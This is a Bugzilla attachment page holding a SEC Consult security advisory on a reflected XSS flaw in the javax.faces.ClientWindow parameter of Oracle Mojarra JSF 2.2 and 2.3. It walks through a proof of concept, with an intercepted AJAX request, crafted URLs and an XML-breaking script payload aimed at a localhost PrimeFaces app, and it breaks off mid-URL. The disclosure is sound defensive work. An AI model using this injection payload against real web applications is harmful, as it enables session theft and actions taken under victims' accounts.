Download
Getting Started
Members
Projects
Community
Marketplace
Events
Planet Eclipse
Newsletter
Videos
Participate
Report a Bug
Forums
Mailing Lists
Wiki
IRC
How to Contribute
Working Groups
Automotive
Internet of Things
LocationTech
Long-Term Support
PolarSys
Science
OpenMDM
More
Community
Marketplace
Events
Planet Eclipse
Newsletter
Videos
Participate
Report a Bug
Forums
Mailing Lists
Wiki
IRC
How to Contribute
Working Groups
Automotive
Internet of Things
LocationTech
Long-Term Support
PolarSys
Science
OpenMDM
Toggle navigation
Bugzilla – Attachment 278927 Details for
Bug 548244
Vulnerability within Oracle Mojarra JSF v2.2 and v2.3
Home
|
New
|
Browse
|
Search
|
[?]
|
Reports
|
Requests
|
Help
|
Log In
[x]
|
Terms of Use
|
Copyright Agent
security advisory
advisory.txt (text/plain), 9.90 KB, created by
Jean-Benjamin Rousseau
on 2019-06-13 10:50:52 EDT
(
hide
)
Description:
security advisory
Filename:
MIME Type:
Creator:
Jean-Benjamin Rousseau
Created:
2019-06-13 10:50:52 EDT
Size:
9.90 KB
patch
obsolete
>Confidentiality class: Internal & Partner > >SEC Consult Vulnerability Lab Security Advisory < publishing date YYYYMMDD-0 > >======================================================================= > title: Reflected Cross-Site Scripting (XSS) > product: Oracle Mojarra JSF included in Java EE 7 > vulnerable version: 2.2 & 2.3 > fixed version: https://github.com/javaserverfaces/mojarra/commits/MOJARRA_2_2X_ROLLING > https://github.com/javaserverfaces/mojarra/commits/MOJARRA_2_3X_ROLLING > CVE number: > impact: High > homepage: https://javaserverfaces.github.io/ > found: 2018-11-12 > by: Jean-Benjamin Rousseau (Office Zurich) > Guillaume Crouquet (Office Zurich) > SEC Consult Vulnerability Lab > > An integrated part of SEC Consult > Europe | Asia | North America > > https://www.sec-consult.com > >======================================================================= > >Vendor description: >------------------- >"JavaServer Faces technology simplifies building user interfaces for >JavaServer applications. Developers can build web applications by >assembling reuseable UI components in a page; connecting these >components to an application data source; and wiring client-generated >events to server-side event handlers. This project provides information >on the continued development of the JavaServer Faces specification. > >JavaServer Faces (JSF) is a JCP Standard technology for authoring >component based user interfaces on the Java EE platform." > >Source: https://javaee.github.io/javaserverfaces-spec/ > > >Business recommendation: >------------------------ >By exploiting the vulnerability documented in this advisory, an attacker >can execute arbitrary scripts in the context of the web application in the >victim's browser. Besides performing arbitrary actions within the >application with the victim's account or manipulating the application's >interface, the attacker can potentially steal session tokens, redirect >the victim to external pages and perform attacks against their browser. > >SEC Consult recommends to implement the available patch provided by Oracle. > > >Vulnerability overview/description: >----------------------------------- >The Oracle Mojarra implementation of JavaServer Faces (JSF) v2.2 and v2.3 >are concerned by a lack of input validation on the javax.faces.ClientWindow >parameter which can lead under certain conditions to Reflected Cross-Site >Scripting (XSS). >Oracle Mojarra JSF v2.2 and v2.3 are respectively the user interface >standards for Java EE 7 and Java EE 8. > >The vulnerability is not directly exploitable in Oracle Mojarra JSF v2.2 >and v2.3. However, different frameworks based on this library and having >a custom implementation of the Faces-Request HTTP headers for AJAX requests > can be concerned. PrimeFaces v6.0 is one example of a vulnerable framework. > >This vulnerability affects the web applications fulfilling the following >conditions: > - Usage of a framework based on Oracle Mojarra JSF v2.2 or v2.3 > - Usage of AJAX requests in the web applications > - Custom implementation of the Faces-Request HTTP headers for AJAX requests > - Presence of the javax.faces.CLIENT_WINDOW_MODE context parameter >set to "url" in the web.xml file: > ><context-param> > <param-name>javax.faces.CLIENT_WINDOW_MODE</param-name> > <param-value>url</param-value> ></context-param> > > >Proof of concept: >----------------- >In this Proof of Concept, the tests are based on PrimeFaces v6.0, >an open source framework for JSF. Other frameworks based on >Oracle Mojarra JSF 2.2 or 2.3 can also be concerned. > >Step 1: Generate an AJAX request on the web application and intercept it. >POST /HelloPrimeFaces/faces/welcomePrimefaces.xhtml?jfwid=2a616ef87aeed7521b02ceb4e163:0 HTTP/1.1 >Host: localhost:8080 >Content-Length: 405 >Accept: application/xml, text/xml, */*; q=0.01 >Origin: http://localhost:8080 >X-Requested-With: XMLHttpRequest >Faces-Request: partial/ajax >Content-Type: application/x-www-form-urlencoded; charset=UTF-8 >Accept-Encoding: gzip, deflate >Accept-Language: fr-FR,fr;q=0.9,en-US;q=0.8,en;q=0.7 >Cookie: JSESSIONID=2a616ef87aeed7521b02ceb4e163 >Connection: close > >javax.faces.partial.ajax=true&javax.faces.source=j_idt18%3AbtnSurname&javax.faces.partial.execute=j_idt18%3AbtnSurname+j_idt18%3Asurname&javax.faces.partial.render=j_idt18%3Agrid&j_idt18%3AbtnSurname=j_idt18%3AbtnSurname&j_idt18=j_idt18&j_idt18%3Afirstname=&j_idt18%3Asurname=surname&javax.faces.ViewState=7025249133904776332%3A-921340693957557245&javax.faces.ClientWindow=2a616ef87aeed7521b02ceb4e163%3A0 > >Step 2: Transpose the POST parameters into GET parameters and >build a new URL with it. >http://localhost:8080/HelloPrimeFaces/faces/welcomePrimefaces.xhtml?jfwid=2a616ef87aeed7521b02ceb4e163:0&javax.faces.partial.ajax=true&javax.faces.source=j_idt18%3AbtnSurname&javax.faces.partial.execute=j_idt18%3AbtnSurname+j_idt18%3Asurname&javax.faces.partial.render=j_idt18%3Agrid&j_idt18%3AbtnSurname=j_idt18%3AbtnSurname&j_idt18=j_idt18&j_idt18%3Afirstname=&j_idt18%3Asurname=surname&javax.faces.ViewState=7025249133904776332%3A-921340693957557245&javax.faces.ClientWindow=2a616ef87aeed7521b02ceb4e163%3A0 > >Step 3: Strip out the javax.faces.ViewState GET parameter from the URL. >http://localhost:8080/HelloPrimeFaces/faces/welcomePrimefaces.xhtml?jfwid=2a616ef87aeed7521b02ceb4e163:0&javax.faces.partial.ajax=true&javax.faces.source=j_idt18%3AbtnSurname&javax.faces.partial.execute=j_idt18%3AbtnSurname+j_idt18%3Asurname&javax.faces.partial.render=j_idt18%3Agrid&j_idt18%3AbtnSurname=j_idt18%3AbtnSurname&j_idt18=j_idt18&j_idt18%3Afirstname=&j_idt18%3Asurname=surname&javax.faces.ClientWindow=2a616ef87aeed7521b02ceb4e163%3A0 > >Step 4: Prefix the javax.faces.ClientWindow GET parameter with >the following payload: >]]></update><something%3ascript+xmlns%3asomething%3d"http%3a//www.w3.org/1999/xhtml">alert('SEC Consult')</something%3ascript><update+id%3d"j_id1%3ajavax.faces.ClientWindow%3a0"><![CDATA[ > >Resulting URL: >http://localhost:8080/HelloPrimeFaces/faces/welcomePrimefaces.xhtml?jfwid=2a616ef87aeed7521b02ceb4e163:0&javax.faces.partial.ajax=true&javax.faces.source=j_idt18%3AbtnSurname&javax.faces.partial.execute=j_idt18%3AbtnSurname+j_idt18%3Asurname&javax.faces.partial.render=j_idt18%3Agrid&j_idt18%3AbtnSurname=j_idt18%3AbtnSurname&j_idt18=j_idt18&j_idt18%3Afirstname=&j_idt18%3Asurname=surname&javax.faces.ClientWindow=]]></update><something%3ascript+xmlns%3asomething%3d"http%3a//www.w3.org/1999/xhtml">alert('SEC+Consult')</something%3ascript><update+id%3d"j_id1%3ajavax.faces.ClientWindow%3a0"><
